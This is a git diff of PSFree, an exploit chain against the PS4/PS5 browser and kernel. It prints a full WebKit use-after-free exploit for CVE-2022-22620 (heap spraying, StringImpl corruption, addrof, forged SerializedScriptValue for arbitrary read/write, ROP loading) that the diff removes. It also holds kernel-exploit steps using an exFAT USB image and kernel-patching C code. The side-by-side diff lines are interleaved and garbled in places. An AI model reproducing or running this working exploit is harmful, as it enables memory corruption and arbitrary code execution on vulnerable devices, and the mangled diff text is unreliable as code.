`${reason}\n` 'Unhandled rejection\n'
+ `${reason}\n`
+ `${reason.sourceURL}:${reason.line}:${reason.column}\n` + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
+ `${reason.stack}` + `${reason.stack}`
); );
throw reason; });
})
// important that we dynamically import the exploit script after we attach addEventListener('error', event => {
import('./exploit.mjs'); const reason = event.error;
alert(
'Unhandled error\n'
+ `${reason}\n`
+ `${reason.sourceURL}:${reason.line}:${reason.column}\n`
+ `${reason.stack}`
);
return true;
});
// we have to dynamically import the program if we want to catch its syntax
// errors
import('./psfree.mjs');
config.mjs
+36 -69
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023-2024 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -22,82 +22,49 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
// can affect the size of SerializedScriptValue // can affect the size of SerializedScriptValue
// //
// this target is no longer supported // this target is no longer supported
// target firmware format used by PSFree
// //
//export const gtk_2_34_4 = 0; // 0xC_MM_mm
//
// * C console - PS4 (0) or PS5 (1) (1 bit)
// * MM major version - integer part of the firmware version (8 bits)
// * mm minor version - fractional part of the firmware version (8 bits)
//
// examples:
// * PS4 10.00 -> C = 0 MM = 10 mm = 0 -> 0x0_10_00
// * PS5 4.51 -> C = 1 MM = 4 mm = 51 -> 0x1_04_51
// the original target platform was 8.03, this version confirmed works on ps4 // check if value is in Binary Coded Decimal format
// 7.xx-8.xx // assumes integer and is in the range [0, 0xffff]
export const ps4_8_03 = 1; function check_bcd(value) {
for (let i = 0; i <= 12; i += 4) {
const nibble = (value >>> i) & 0xf;
// this version for 9.xx if (nibble > 9) {
export const ps4_9_00 = 2; return false;
}
}
// version 9.xx is for ps5 1.xx-5.xx as well return true;
export const ps5_5_00 = ps4_9_00; }
// this version for 6.50-6.72
export const ps4_6_50 = 3;
// this version for 6.00-6.20
export const ps4_6_00 = 4;
export function set_target(value) { export function set_target(value) {
switch (value) { if (!Number.isInteger(value)) {
case ps4_8_03: throw TypeError(`value not an integer: ${value}`);
case ps4_9_00: }
case ps4_6_00:
case ps4_6_50: { if (value >= 0x20000 || value < 0) {
break; throw RangeError(`value >= 0x20000 or value < 0: ${value}`);
} }
default: {
throw RangeError('invalid target: ' + target); const version = value & 0xffff;
} if (!check_bcd(version)) {
throw RangeError(`value & 0xffff not in BCD format ${version}`);
} }
target = value; target = value;
} }
function DetectFirmwareVersion() //function by kameleon :) export let target = null;
{ set_target(0x900);
var UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("PlayStation 4/","");
if (UA == "6.00" || UA == "6.02" || UA == "6.10" || UA == "6.20")
{
return ps4_6_00;
}
if (UA == "6.50" || UA == "6.70" || UA == "6.71" || UA == "6.72")
{
return ps4_6_50;
}
if (UA == "7.01" || UA == "7.02" || UA == "7.50" || UA == "7.51" || UA == "7.55" || UA == "8.00" || UA == "8.01" || UA == "8.03")
{
return ps4_8_03;
}
//on 9.00 Fw detection changed to laystation instead of regular Playstation
UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("layStation 4/","");
if (UA == "8.50" || UA == "8.51")
{
return ps4_8_03;
}
if (UA == "9.00" || UA == "9.03" || UA == "9.04" || UA == "9.50" || UA == "9.51" || UA == "9.60")
{
return ps4_9_00;
}
//get user agent for PS5 (taken from PS5 Specter Exploit Host)
const supportedFirmwares = ["1.00","1.01","1.02","1.05","1.12","1.14","2.00","2.10","2.20","2.25","2.26","2.30","2.50","2.70","3.00","3.10","3.20","3.21","4.00", "4.02", "4.03", "4.50", "4.51","5.00","5.02","5.10","5.50"];
const fw_idx = navigator.userAgent.indexOf('PlayStation; PlayStation 5/') + 27;
const fw_str = navigator.userAgent.substring(fw_idx, fw_idx + 4);
if (supportedFirmwares.includes(fw_str))
{
return ps5_5_00;
}
}
export let target = DetectFirmwareVersion();
exploit.mjs
-757
View File
@@ -1,757 +0,0 @@
/* Copyright (C) 2023-2024 anonymous
This file is part of PSFree.
PSFree is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
PSFree is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
import * as config from './config.mjs';
import {
read32,
read64,
write16,
write32,
write64,
sread64,
} from './module/rw.mjs';
import * as o from './module/offset.mjs';
import { Int } from './module/int64.mjs';
import { Memory } from './module/mem.mjs';
import {
die,
debug_log,
clear_log,
str2array,
} from './module/utils.mjs';
const ssv_len = (() => {
switch (config.target) {
case config.ps4_6_00: {
return 0x58;
}
case config.ps4_9_00: {
return 0x50;
}
case config.ps4_6_50:
case config.ps4_8_03: {
return 0x48;
}
default: {
throw RangeError('invalid config.target: ' + config.target);
}
}
})();
const num_reuse = 0x400;
// size of JSArrayBufferView
const original_strlen = ssv_len - o.size_strimpl;
const buffer_len = 0x20;
// make sure this is large enough to ensure that enough strings will
// occupy any gaps in in the relative read area so when are trying to leak the
// JSArrayBufferView we won't hit any unmapped areas
const num_str = 0x400;
const num_gc = 30;
const num_space = 19;
const original_loc = window.location.pathname;
const loc = original_loc + '#foo';
// this variable has to be global for the leak to work
let rstr = null;
// this variable has to be global so that the exploit is more likely to succeed
let view_leak_arr = [];
// These variables need to be global because we theorize there are
// optimizations between local and global variables.
// We don't know what optimizations these are but it is messing with us.
// contents of the JSArrayBufferView
// 3rd element is the address of the buffer of the JSArrayBufferView
let jsview = [];
// object for saving values
let s1 = {views : []};
let view_leak = null;
let input = document.body.appendChild(document.createElement("input"));
let foo = document.body.appendChild(document.createElement("a"));
foo.id = "foo";
// The theory is that the allocator and garbage collector (GC) cooperate in
// serving allocation requests. The GC knows if there are any garbage that can
// be collected, to free up memory for requests. If the allocator can't serve a
// request, it will ask the GC to perform a garbage collection.
//
// If even after a garbage colllection, there is still no memory left for
// allocation, then the process will request the operating system to increase
// its heap size.
//
// We loop a couple of times by num_loop in allocating memory and dropping
// references to it. Even though we dropped the references immediately, memory
// consumption will still grow, since garbage is not immediately collected.
// Hopefully one of the requests will force the allocator to yield to the GC.
let pressure = null;
function gc(num_loop) {
pressure = Array(100);
for (let i = 0; i < num_loop; i++) {
for (let i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x40000);
}
pressure = Array(100);
}
pressure = null;
}
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
function prepare_uaf() {
// don't want any state0 near state1
history.pushState('state0', '');
for (let i = 0; i < num_space; i++) {
history.replaceState('state0', '');
}
history.replaceState("state1", "", loc);
// don't want any state2 near state1
history.pushState("state2", "");
for (let i = 0; i < num_space; i++) {
history.replaceState("state2", "");
}
}
function free(save) {
// We replace the URL with the original so the user can rerun the exploit
// via a reload. If we don't then the exploit will append another "#foo" to
// the URL and the input element will not be blurred because the foo
// element won't be scrolled to during history.back().
history.replaceState('state3', '', original_loc);
for (let i = 0; i < num_reuse; i++) {
let view = new Uint8Array(new ArrayBuffer(ssv_len));
for (let i = 0; i < view.length; i++) {
view[i] = 0x41;
}
save.views.push(view);
}
}
function check_spray(views) {
if (views.length !== num_reuse) {
debug_log(`views.length: ${views.length}`);
die('views.length !== num_reuse, restart the entire exploit');
}
for (let i = 0; i < num_reuse; i++) {
if (views[i][0] !== 0x41) {
return i;
}
}
return null;
}
async function use_after_free(pop_func, save) {
const pop_promise = new Promise((resolve, reject) => {
function pop_wrapper(event) {
try {
pop_func(event, save);
} catch (e) {
reject(e);
}
resolve();
}
addEventListener("popstate", pop_wrapper, {once:true});
});
prepare_uaf();
let num_free = 0;
function onblur() {
if (num_free > 0) {
die('multiple free()s, restart the entire exploit');
}
free(save);
num_free++;
}
input.onblur = onblur;
await new Promise((resolve) => {
input.addEventListener('focus', resolve, {once:true});
input.focus();
});
history.back();
await pop_promise;
}
// get arbitrary read
async function setup_ar(save) {
const view = save.ab;
// set refcount to 1, all other fields to 0/NULL
view[0] = 1;
for (let i = 1; i < view.length; i++) {
view[i] = 0;
}
delete save.views;
delete save.pop;
gc(num_gc);
debug_log('setup_ar() gc done');
// Extra sleep if the object hasn't been collected yet, this is to allow
// the garbage collector to preempt us. Keeping the call to gc() lowers the
// average total sleep time.
let total_sleep = 0;
const num_sleep = 8;
// Don't sleep for 9.xx. Tests show it is slower. This check and the sleep
// before double_free() make setup_ar() fast for 9.xx.
while (true && config.target !== config.ps4_9_00) {
await sleep(num_sleep);
total_sleep += num_sleep;
if (view[0] !== 1) {
break;
}
}
debug_log(`total_sleep: ${total_sleep}`);
// log to check if the garbage collector did collect PopStateEvent
// must not log "1, 0, 0, 0, ..."
debug_log(view);
let num_spray = 0;
while (true) {
const obj = {};
num_spray++;
for (let i = 0; i < num_str; i++) {
let str = new String(
'B'.repeat(original_strlen - 5)
+ i.toString().padStart(5, '0')
);
obj[str] = 0x1337;
}
if (view[o.strimpl_inline_str] === 0x42) {
write32(view, o.strimpl_strlen, 0xffffffff);
} else {
continue;
}
let found = false;
const str_arr = Object.getOwnPropertyNames(obj);
for (let i = 0; i < str_arr.length; i++) {
if (str_arr[i].length > 0xff) {
rstr = str_arr[i];
found = true;
debug_log('confirmed correct leaked');
debug_log(`str len: ${rstr.length}`);
debug_log(view);
debug_log(`read address: ${read64(view, o.strimpl_m_data)}`);
break;
}
}
if (!found) {
continue;
}
debug_log(`num_spray: ${num_spray}`);
return;
}
}
async function double_free(save) {
const view = save.ab;
await setup_ar(save);
// Spraying JSArrayBufferViews
debug_log('spraying views');
let buffer = new ArrayBuffer(buffer_len);
let tmp = [];
const num_alloc = 0x10000;
const num_threshold = 0xfc00;
const num_diff = num_alloc - num_threshold;
for (let i = 0; i < num_alloc; i++) {
// The last allocated are more likely to be allocated after our relative read
if (i >= num_threshold) {
view_leak_arr.push(new Uint8Array(buffer));
} else {
tmp.push(new Uint8Array(buffer));
}
}
tmp = null;
debug_log('done spray views');
// Force JSC ref on FastMalloc Heap
// https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
let props = [];
for (let i = 0; i < num_diff; i++) {
props.push({ value: 0x43434343 });
props.push({ value: view_leak_arr[i] });
}
debug_log('start find leak');
//
// /!\
// This part must avoid as much as possible fastMalloc allocation
// to avoid re-using the targeted object
// /!\
//
// Use relative read to find our JSC obj
// We want a JSArrayBufferView that is allocated after our relative read
search: while (true) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
let v = null;
if (rstr.charCodeAt(i) === 0x43 &&
rstr.charCodeAt(i + 1) === 0x43 &&
rstr.charCodeAt(i + 2) === 0x43 &&
rstr.charCodeAt(i + 3) === 0x43
) {
// check if PropertyDescriptor
if (rstr.charCodeAt(i + 0x08) === 0x00 &&
rstr.charCodeAt(i + 0x0f) === 0x00 &&
rstr.charCodeAt(i + 0x10) === 0x00 &&
rstr.charCodeAt(i + 0x17) === 0x00 &&
rstr.charCodeAt(i + 0x18) === 0x0e &&
rstr.charCodeAt(i + 0x1f) === 0x00 &&
rstr.charCodeAt(i + 0x28) === 0x00 &&
rstr.charCodeAt(i + 0x2f) === 0x00 &&
rstr.charCodeAt(i + 0x30) === 0x00 &&
rstr.charCodeAt(i + 0x37) === 0x00 &&
rstr.charCodeAt(i + 0x38) === 0x0e &&
rstr.charCodeAt(i + 0x3f) === 0x00
) {
v = str2array(rstr, 8, i + 0x20);
// check if array of JSValues pointed by m_buffer
} else if (rstr.charCodeAt(i + 0x10) === 0x43 &&
rstr.charCodeAt(i + 0x11) === 0x43 &&
rstr.charCodeAt(i + 0x12) === 0x43 &&
rstr.charCodeAt(i + 0x13) === 0x43) {
v = str2array(rstr, 8, i + 8);
}
}
if (v !== null) {
view_leak = new Int(v);
break search;
}
}
}
//
// /!\
// Critical part ended-up here
// /!\
//
debug_log('end find leak');
debug_log('view addr ' + view_leak);
let rstr_addr = read64(view, o.strimpl_m_data);
write64(view, o.strimpl_m_data, view_leak);
for (let i = 0; i < 4; i++) {
jsview.push(sread64(rstr, i*8));
}
write64(view, o.strimpl_m_data, rstr_addr);
write32(view, o.strimpl_strlen, original_strlen);
debug_log('contents of JSArrayBufferView');
debug_log(jsview);
}
function find_leaked_view(rstr, view_rstr, view_m_vector, view_arr) {
const old_m_data = read64(view_rstr, o.strimpl_m_data);
let res = null;
write64(view_rstr, o.strimpl_m_data, view_m_vector);
for (const view of view_arr) {
const magic = 0x41424344;
write32(view, 0, magic);
if (sread64(rstr, 0).low() === magic) {
res = view;
break;
}
}
write64(view_rstr, o.strimpl_m_data, old_m_data);
if (res === null) {
die('not found');
}
return res;
}
class Reader {
// leaker will be the view whose address we leaked
constructor(rstr, view_rstr, leaker, leaker_addr) {
this.rstr = rstr;
this.view_rstr = view_rstr;
this.leaker = leaker;
this.leaker_addr = leaker_addr;
this.old_m_data = read64(view_rstr, o.strimpl_m_data);
// Create a butterfy with the "a" property as the first. leaker is a
// JSArrayBufferView. Instances of that class don't have inlined
// properties and the butterfly is immediately created.
leaker.a = 0; // dummy value, we just want to create the "a" property
}
addrof(obj) {
if (typeof obj !== 'object'
&& typeof obj !== 'function'
) {
throw TypeError('addrof argument not a JS object');
}
this.leaker.a = obj;
// no need to modify the length, original_strlen is large enough
write64(this.view_rstr, o.strimpl_m_data, this.leaker_addr);
const butterfly = sread64(this.rstr, o.js_butterfly);
write64(this.view_rstr, o.strimpl_m_data, butterfly.sub(0x10));
const res = sread64(this.rstr, 0);
write64(this.view_rstr, o.strimpl_m_data, this.old_m_data);
return res;
}
get_view_vector(view) {
if (!ArrayBuffer.isView(view)) {
throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
}
write64(this.view_rstr, o.strimpl_m_data, this.addrof(view));
const res = sread64(this.rstr, o.view_m_vector);
write64(this.view_rstr, o.strimpl_m_data, this.old_m_data);
return res;
}
}
// data to write to the SerializedScriptValue
//
// Setup to make deserialization create an ArrayBuffer with its buffer address
// pointing to a JSArrayBufferView (worker).
//
// TypedArrays (JSArrayBufferView) created via "new TypedArray(x)" where x <=
// 1000 (fastSizeLimit) have ther buffers allocated on the JavaScript heap
// (m_mode = FastTypedArray). Requesting the buffer property ("view.buffer")
// (calls possiblySharedBuffer()) of such a view will allocate a new buffer on
// the fastMalloc heap, the contents of the old one will be copied. This will
// change the m_vector field, so care must be taken if you cache the result of
// get_view_vector(), you must call it again to get the updated field.
//
// See enum TypedArrayMode from
// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferView.h and
// possiblySharedBuffer() from
// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h at PS4 8.03.
function setup_ssv_data(reader) {
const r = reader;
// sizeof WTF::Vector<T>
const size_vector = 0x10;
// sizeof JSC::ArrayBufferContents
const size_abc = config.target === config.ps4_9_00 ? 0x18 : 0x20;
// WTF::Vector<unsigned char>
const m_data = new Uint8Array(size_vector);
const data = new Uint8Array(9);
// m_buffer
write64(m_data, 0, r.get_view_vector(data));
// m_capacity
write32(m_data, 8, data.length);
// m_size
write32(m_data, 0xc, data.length);
// 6 is the serialization format version number for ps4 6.00. The format
// is backwards compatible and using a value less than the current version
// number used by a specific WebKit version is considered valid.
//
// See CloneDeserializer::isValid() from
// WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.03.
const CurrentVersion = 6;
const ArrayBufferTransferTag = 23;
write32(data, 0, CurrentVersion);
data[4] = ArrayBufferTransferTag;
write32(data, 5, 0);
// WTF::Vector<JSC::ArrayBufferContents>
const abc_vector = new Uint8Array(size_vector);
// JSC::ArrayBufferContents
const abc = new Uint8Array(size_abc);
write64(abc_vector, 0, r.get_view_vector(abc));
write32(abc_vector, 8, 1);
write32(abc_vector, 0xc, 1);
// m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
// unlike FastTypedArray, where the buffer is managed by the GC. This
// prevents random crashes.
//
// See JSGenericTypedArrayView<Adaptor>::visitChildren() from
// WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
// PS4 8.03.
const worker = new Uint8Array(new ArrayBuffer(1));
if (config.target !== config.ps4_9_00) {
// m_destructor
write64(abc, 0, Int.Zero);
// m_shared
write64(abc, 8, Int.Zero);
// m_data
write64(abc, 0x10, r.addrof(worker));
// m_sizeInBytes
write32(abc, 0x18, o.size_view);
} else {
// m_data
write64(abc, 0, r.addrof(worker));
// m_destructor (48 bits)
write32(abc, 8, 0);
write16(abc, 0xc, 0);
// m_shared (48 bits)
write32(abc, 0xe, 0);
write16(abc, 0x12, 0);
// m_sizeInBytes
write32(abc, 0x14, o.size_view);
}
return {
m_data,
m_arrayBufferContentsArray : r.get_view_vector(abc_vector),
worker,
// keep a reference to prevent garbage collection
nogc : [
data,
abc_vector,
abc,
],
};
}
// get arbitrary read/write
async function setup_arw(save, ssv_data) {
const num_msg = 1000;
const view = save.ab;
let msgs = [];
function onmessage(event) {
msgs.push(event);
}
addEventListener('message', onmessage);
// Free the StringImpl so we can spray SerializedScriptValues over the
// buffer of the view. The StringImpl is safe to free since we fixed it up
// earlier.
rstr = null;
while (true) {
for (let i = 0; i < num_msg; i++) {
postMessage('', origin);
}
while (msgs.length !== num_msg) {
await sleep(100);
}
if (view[o.strimpl_inline_str] !== 0x42) {
break;
}
msgs = [];
}
removeEventListener('message', onmessage);
debug_log('view contents:');
for (let i = 0; i < ssv_len; i += 8) {
debug_log(read64(view, i));
}
// save SerializedScriptValue
const copy = [];
for (let i = 0; i < view.length; i++) {
copy.push(view[i]);
}
const {m_data, m_arrayBufferContentsArray, worker, nogc} = ssv_data;
write64(view, 8, read64(m_data, 0));
write64(view, 0x10, read64(m_data, 8));
write64(view, 0x18, m_arrayBufferContentsArray);
for (const msg of msgs) {
if (msg.data !== '') {
debug_log('achieved arbitrary r/w');
const u = new Uint8Array(msg.data);
debug_log('deserialized ArrayBuffer:');
for (let i = 0; i < o.size_view; i += 8) {
debug_log(read64(u, i));
}
const mem = new Memory(u, worker);
// restore SerializedScriptValue
view.set(copy);
// cleanup
view_leak_arr = null;
view_leak = null;
jsview = null;
input = null;
foo = null;
// Before s1.ab gets garbage collected and its underlying buffer
// on the fastMalloc heap is freed, another object could be
// allocated in the meantime. That object could be freed
// prematurely once the GC occurs. This could corrupt the object
// if another object is allocated in the same memory area.
//
// So we will keep s1 alive.
return;
}
}
die('no arbitrary r/w');
}
// Don't create additional references to rstr, use the global variable. This
// is to make dropping all its references easy (change the value of the global
// variable).
async function triple_free(
save,
// contents of the leaked JSArrayBufferView
jsview,
view_leak_arr,
leaked_view_addr,
) {
const leaker = find_leaked_view(rstr, save.ab, jsview[2], view_leak_arr);
let r = new Reader(rstr, save.ab, leaker, leaked_view_addr);
const ssv_data = setup_ssv_data(r);
// r contains a reference to rstr, drop it for setup_arw()
r = null;
await setup_arw(save, ssv_data);
}
function pop(event, save) {
let spray_res = check_spray(save.views);
if (spray_res === null) {
die('failed spray');
} else {
save.pop = event;
save.ab = save.views[spray_res];
debug_log('ssv len: ' + ssv_len);
debug_log('view index: ' + spray_res);
debug_log(save.ab);
}
}
// For some reason the input element is being blurred by something else (we
// don't know what) if we execute use_after_free() before the DOMContentLoaded
// event fires. The input must only be blurred by history.back(), which will
// change the focus from the input to the foo element.
async function get_ready() {
debug_log('readyState: ' + document.readyState);
await new Promise((resolve, reject) => {
if (document.readyState === 'interactive' || document.readyState === 'complete') {
resolve();
}
document.addEventListener('DOMContentLoaded', resolve, { once: true });
});
}
//load per firmware Rop Test function by kameleon..
function ExecRopByFw()
{
var UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("PlayStation 4/","");
if (UA == "6.00" || UA == "6.02" || UA == "6.10" || UA == "6.20")
{
alert("No ROP implemented");
}
if (UA == "6.50" || UA == "6.70" || UA == "6.71" || UA == "6.72")
{
alert("No ROP implemented");
}
if (UA == "7.01" || UA == "7.02" || UA == "7.50" || UA == "7.51" || UA == "7.55")
{
import('./send.mjs');
}
//8.00 and 8.01 need to be tested.. this is mostly for 8.03
if (UA == "8.00" || UA == "8.01" || UA == "8.03")
{
import('./rop/800.mjs');
}
//on 8.5x to 9.60 Fw detection changed to laystation instead of regular Playstation
UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("layStation 4/","");
if (UA == "8.50" || UA == "8.51")
{
import('./rop/850.mjs');
}
if (UA == "9.00" || UA == "9.03" || UA == "9.04")
{
import('./rop/900.mjs');
}
if (UA == "9.50" || UA == "9.51" || UA == "9.60")
{
import('./rop/950.mjs');
}
//get user agent for PS5 (taken from PS5 Specter Exploit Host)
const supportedFirmwares = ["1.00","1.01","1.02","1.05","1.12","1.14","2.00","2.10","2.20","2.25","2.26","2.30","2.50","2.70","3.00","3.10","3.20","3.21","4.00", "4.02", "4.03", "4.50", "4.51","5.00","5.02","5.10","5.50"];
const fw_idx = navigator.userAgent.indexOf('PlayStation; PlayStation 5/') + 27;
const fw_str = navigator.userAgent.substring(fw_idx, fw_idx + 4);
if (supportedFirmwares.includes(fw_str))
{
alert("No ROP implemented");
}
}
async function run() {
debug_log('stage: readying');
await get_ready();
debug_log('stage: UaF 1');
await use_after_free(pop, s1);
// we trigger the leak first because it is more likely to work
// than if it were to happen during the second ssv smashing
// on the ps4
debug_log('stage: double free');
// * keeps setup_ar()'s total sleep even lower
// * also helps the garbage collector scheduling for 9.xx
await sleep(0);
await double_free(s1);
debug_log('stage: triple free');
await triple_free(s1, jsview, view_leak_arr, view_leak);
clear_log();
// path to your script that will use the exploit
ExecRopByFw();
}
run();
fonts/FONTS.LICENSE
+101
View File
@@ -0,0 +1,101 @@
Digitized data copyright (c) 2010 Google Corporation
with Reserved Font Arimo, Tinos and Cousine.
Copyright (c) 2012 Red Hat, Inc.
with Reserved Font Name Liberation.
This Font Software is licensed under the SIL Open Font License,
Version 1.1.
This license is copied below, and is also available with a FAQ at:
http://scripts.sil.org/OFL
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
PREAMBLE The goals of the Open Font License (OFL) are to stimulate
worldwide development of collaborative font projects, to support the font
creation efforts of academic and linguistic communities, and to provide
a free and open framework in which fonts may be shared and improved in
partnership with others.
The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves.
The fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply to
any document created using the fonts or their derivatives.
DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such.
This may include source files, build scripts and documentation.
"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).
"Original Version" refers to the collection of Font Software components
as distributed by the Copyright Holder(s).
"Modified Version" refers to any derivative made by adding to, deleting,
or substituting ? in part or in whole ?
any of the components of the Original Version, by changing formats or
by porting the Font Software to a new environment.
"Author" refers to any designer, engineer, programmer, technical writer
or other person who contributed to the Font Software.
PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining a
copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:
1) Neither the Font Software nor any of its individual components,in
Original or Modified Versions, may be sold by itself.
2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.
3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the
corresponding Copyright Holder. This restriction only applies to the
primary font name as presented to the users.
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.
5) The Font Software, modified or unmodified, in part or in whole, must
be distributed entirely under this license, and must not be distributed
under any other license. The requirement for fonts to remain under
this license does not apply to any document created using the Font
Software.
TERMINATION
This license becomes null and void if any of the above conditions are not met.
DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER
DEALINGS IN THE FONT SOFTWARE.
fonts/LiberationMono-Regular.ttf
BIN
View File
Binary file not shown.
fonts/README.txt
+3
View File
@@ -0,0 +1,3 @@
git: https://github.com/liberationfonts/liberation-fonts.git
See FONTS.LICENSE for the license.
index.html
+25 -38
View File
@@ -1,4 +1,4 @@
<!-- Copyright (C) 2023 anonymous <!-- Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,40 +15,27 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. along with this program. If not, see <https://www.gnu.org/licenses/>.
--> -->
<script> <html>
//function added By EchoSrech <head>
var fwFromUA = parseFloat(navigator.userAgent.substring(navigator.userAgent.indexOf('PlayStation ') + 14, navigator.userAgent.indexOf(') Apple'))); <meta charset='utf-8'>
<title>exploit</title>
if (navigator.userAgent.includes('PlayStation 4')) { <style>
if (fwFromUA >= 6.00 && fwFromUA <= 9.60) { @font-face {
alert(`Current PS4 Firmware: ${fwFromUA.toFixed(2)}. Are You Ready?`); font-family: 'logging';
} else { src: url('fonts/LiberationMono-Regular.ttf');
alert(`Current PS4 Firmware ${fwFromUA.toFixed(2)} Is Not Supported`); }
window.stop(); #console {
} font-family: 'logging';
} else if (navigator.userAgent.includes('PlayStation 5')) { }
if (fwFromUA >= 1.00 && fwFromUA <= 5.50) { </style>
alert(`Current PS5 Firmware: ${fwFromUA.toFixed(2)}. Are You Ready?`); </head>
} else { <body>
alert(`Current PS5 Firmware ${fwFromUA.toFixed(2)} Is Not Supported`); PSFree: A PS4/PS5 Exploit Chain<br>
window.stop(); Donation (Monero/XMR):<br>
} 86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS<br>
} else { See <a href='./about.html' data-jslicense='1'>JavaScript license information</a> for the
alert(`Current System Is Not Supported`); source code and license.<br>
window.stop(); <pre id='console'></pre>
} </body>
</script> <script type='module' src='alert.mjs'></script>
<html> </html>
<head>
<meta charset='utf-8'>
<title>PSFree 1.4.0 Beta 4</title>
</head>
<body>
PS4/PS5 exploit using CVE-2022-22620<br>
PS4 versions vulnerable: 6.xx-9.xx (tested 6.00-9.60)<br>
PS5 versions vulnerable: 1.xx-5.xx (tested 1.00-5.50)<br>
<a href="./about.html" data-jslicense="1">JavaScript license information</a>
</body>
<script type='module' src='alert.mjs'></script>
</html>
kernel/80x.txt
-23
View File
@@ -1,23 +0,0 @@
The kernel exploit for the PS4 8.0x firmware series is based on pOOBs4.
exfathax_pico.img is from pOOBs4. This is currently a work in progress.
steps:
* write the exfathax_pico.img file to a USB drive
$ dd if=exfathax_pico.img of=/dev/<your USB drive>
* modify exploit.mjs to run rop/800.mjs:
import('./code.mj') -> import('./rop/800.mjs')
loading the exploit:
* have the browser load index.html
* wait for the "insert USB" alert dialog to prompt you
* Wait for this console notification to pop up: "This USB storage device's file
system is unsupported".
* close the "insert USB" alert dialog by clicking "OK"
* keep closing future alert dialogs
* once you reach a log saying "kernel exploit succeeded", you're done
exFAT heap overflow bug hackerone report:
https://hackerone.com/reports/1340942
pOOBs4:
https://github.com/ChendoChap/pOOBs4
kpatch/80x.c
+85 -53
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2024 anonymous /* Copyright (C) 2024-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -20,14 +20,38 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
#include "types.h" #include "types.h"
#include "utils.h" #include "utils.h"
// Args: struct kexec_args {
// res: u64 entry;
// Needed value to return (as to not crash) if the caller of the hijacked u64 arg1;
// function is expecting some valid value. u64 arg2;
// error: u64 arg3;
// Address to return an error. 0 for success. u64 arg4;
u64 arg5;
};
void do_patch(void);
void restore(struct kexec_args *uap);
__attribute__((section (".text.start"))) __attribute__((section (".text.start")))
u64 kpatch(u64 res, u64 *error) { int kpatch(void *td, struct kexec_args *uap) {
do_patch();
restore(uap);
return 0;
}
void restore(struct kexec_args *uap) {
u8 *pipe = uap->arg1;
u8 *pipebuf = uap->arg2;
for (size_t i = 0; i < 0x18; i++) {
pipe[i] = pipebuf[i];
}
u64 *pktinfo_field = uap->arg3;
*pktinfo_field = 0;
u64 *pktinfo_field2 = uap->arg4;
*pktinfo_field2 = 0;
}
void do_patch(void) {
// offset to fast_syscall() // offset to fast_syscall()
